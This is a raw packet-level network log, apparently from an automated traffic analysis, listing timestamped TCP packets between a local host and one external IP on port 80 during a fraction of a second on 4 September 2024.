Sep 4, 2024 17:37:07.283451080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283463955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283468962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283477068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283478022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283490896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283499002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283504963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283518076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283526897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283529997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283550024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283574104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283927917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283941984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283951998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283963919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283974886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283977032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283986092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283986092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283987045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283999920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284010887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284019947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284022093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284039021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284053087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284080982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284373045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284387112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284395933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284406900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284409046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284419060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284427881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284430981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284441948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284444094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284456968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284467936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284472942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284493923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284514904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284694910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284748077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284789085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284800053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284810066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284821033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284832001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284835100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284843922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.284867048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.284885883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285245895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285258055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285268068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285278082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285289049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285298109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285300016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285312891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285325050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285335064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285341024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285341024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285346031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285356998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285358906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285372972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285375118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285402060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285429001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285738945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285751104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285767078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285785913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285785913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285798073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285799026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285811901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285821915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285823107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285835981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285846949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285846949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285859108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285871029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.285875082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285886049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.285912037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286422014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286432981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286442041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286453962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286464930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286473036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286473989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286487103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286499023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286510944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286515951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286524057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286528111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286545992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286552906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286561012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.286576986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.286592007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287044048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287055016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287066936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287079096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287090063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287090063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287096977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287101984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287112951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287123919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287131071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287134886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287147045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287149906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287157059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287159920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287184000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287208080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287487984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287533998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287539959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287550926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.287575006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.287590981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377032995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377068996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377083063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377206087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377227068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377238989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377249956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377262115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377269983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377279997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377300978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377329111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377506018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377517939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377527952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377538919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377549887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377553940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377562046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377573967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377583981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377583981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377599001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377599955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377610922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377624989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377650023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377924919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377938032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377955914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.377974033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.377999067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378052950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378065109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378076077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378098965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378112078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378191948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378204107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378217936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378246069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378257990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378259897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378272057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378283024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378294945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378295898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378317118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378336906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378663063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378675938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378684998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378696918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378707886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378710985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378720045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378731966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378734112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378743887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378747940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378757954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378772974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378776073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378787041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.378813028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378813028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.378837109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379498959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379512072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379534006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379550934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379560947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379580975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379717112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379728079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379738092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379750013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379760027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379770994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379801035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379833937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379847050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379858017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379872084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379884958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379904032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379925966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379942894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379954100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379971027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379976034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379987955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.379988909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.379998922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380000114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380023956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380049944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380208015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380219936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380230904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380242109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380253077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380260944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380265951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380278111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380280018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380300045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380326033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380575895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380589008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380604982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380614996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380625010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380625963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380637884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380647898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380650043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380675077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380681038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380727053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380731106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380744934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380768061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380784988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380892038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380939007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.380973101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380985975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.380995989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381007910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381015062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381045103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381220102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381232977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381242990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381253958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381264925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381268978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381274939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381278038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381290913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381303072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381304026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381314993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381328106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381350040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381366968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381516933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381529093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381540060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381567001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381581068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381665945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381680012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381685019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381695032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381707907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381720066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381727934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381731987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381745100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381751060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381756067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381759882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381767988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381778955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381789923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381791115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381798983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381812096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381829023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381831884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381840944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.381848097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.381870985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.382446051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382457972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382467031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382477999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382488012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382498026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.382498026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.382507086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.382519960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.382551908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.457757950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457772970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457784891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457823992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.457849979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457860947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.457861900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457875013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457885027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.457887888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.457904100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.457935095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458031893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458043098 CEST	80	49717	147.45.44.104	192.168.2.6
